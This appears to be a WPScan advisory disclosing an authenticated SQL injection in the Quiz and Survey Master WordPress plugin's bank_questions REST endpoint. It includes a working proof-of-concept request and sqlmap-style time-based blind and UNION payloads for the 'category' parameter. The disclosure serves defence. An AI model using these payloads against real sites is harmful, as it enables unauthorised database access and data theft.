While confirming https://wpscan.com/vulnerability/3b52b25c-82a1-41c7-83ac-92e244f7c5ab, another SQLi issue was identified and reported. The qsm_rest_get_bank_questions() function in the php/rest-api.php file did not property sanitise and escape the category parameter before using it in SQL statements passed to the get_row() and get_results() DB calls, allowing users with the edit_post capability (author+) to perform SQL injections. Other SQLi issues were also identified by the WordPress plugin team
GET /wp-json/quiz-survey-master/v1/bank_questions/1?category=a'%20AND%20(SELECT%201950%20FROM%20(SELECT(SLEEP(5)))ckOq)--%20IYpy HTTP/1.1 Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: en-GB,en;q=0.5 Accept-Encoding: gzip, deflate X-WP-Nonce: 2d1236068d X-Requested-With: XMLHttpRequest Connection: close Cookie: [account with edit_post capability (author+)] --- Parameter: category (GET) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: category=a' AND (SELECT 1950 FROM (SELECT(SLEEP(5)))ckOq)-- IYpy Type: UNION query Title: Generic UNION query (NULL) - 27 columns Payload: category=a' UNION ALL SELECT NULL,NULL,CONCAT(0x71767a7871,0x4c65426b7873415142526c6e6c726a61504b4976786f5a7850744a6a78527a69667a486964675262,0x7176786271),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -
2021-03-26 (about 2 years ago)
2021-03-26 (about 2 years ago)
2021-03-26 (about 2 years ago)